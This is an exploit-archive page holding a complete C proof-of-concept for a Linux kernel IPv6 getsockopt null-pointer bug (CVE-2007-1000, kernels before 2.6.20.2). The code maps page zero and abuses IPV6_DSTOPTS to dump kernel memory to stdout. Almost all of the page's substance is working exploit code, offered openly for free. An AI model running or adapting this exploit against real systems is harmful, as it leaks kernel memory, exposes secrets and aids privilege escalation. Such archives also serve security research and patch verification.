exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

linux-26202.txt

linux-26202.txt
Posted Jul 11, 2007
Authored by dreyer

Linux kernel IPV6_Getsockopt_Sticky memory leak proof of concept exploit. This affects versions below 2.6.20.2.

tags | exploit, kernel, proof of concept, memory leak
systems | linux
advisories | CVE-2007-1000
SHA-256 | cb48faf3bced1bda83f19c4186be79d120f5c8718b123839cbca7eedbbbac5dc

linux-26202.txt

Change Mirror Download
/*
* Linux Kernel IPV6_Getsockopt_Sticky Memory Leak Proof Of Concept
* dreyer 07-2007
* Osu, Tatakae, Sexy Pandas!
*
* Dumps to stdout the memory mapped between INI and END.
*
* CVE: CVE-2007-1000 BID: 22904
*
* Affected: Linux Kernel < 2.6.20.2
*
* http://bugzilla.kernel.org/show_bug.cgi?id=8134
*
* Exploitation based on null pointer dereference: http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html
*
* For free!!! ( worth 600 EUR in zerobay! )
*
*/


#include <sys/mman.h>
#include <netinet/in.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

#define HOPOPT_OFFSET 8
#define INIADDR 0xc0100000
#define ENDADDR 0xd0000000
unsigned int i;


int main(int argc, char *argv[]) {
int s;
unsigned int optlen;
void *ptr;
char value[10240];
char text[12];

fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n"
"dreyer '07 - free feels better\n"
"Dumping %p - %p to stdout\n",INIADDR,ENDADDR);

s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);

/* Make np->opt = NULL = 0x00000000 through IPV6_2292PKTOPTIONS */
setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0);

/* Make 0x00000000 address valid */
ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);

if (ptr != NULL) {
perror("mmap");
exit(-1);
}

memset(ptr,0,4096);

/* Make ptr point to np->opt->hopopt = (0x00000000)->hopopt =
* 0x00000000 + 8 */
ptr=(char *)((char *)ptr+HOPOPT_OFFSET);

i=INIADDR;
while(i<ENDADDR) {
/* Put in hopopt the address we want to read */
*((int *)ptr)=i;
optlen=10240;
/* Get the chunk pointed by hopopt through getsockopt IPV6_DSTOPTS */
getsockopt(s, IPPROTO_IPV6, IPV6_DSTOPTS, (void *)value, &optlen);
if(optlen>0) {
sprintf(text,"\n%08x:",i);
write(1,text,strlen(text));
write(1,value,optlen);
i=i+optlen;
} else {
/* We could not read this portion because of some error, skip it */
i=i+4;
}
}

return 0;
}
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close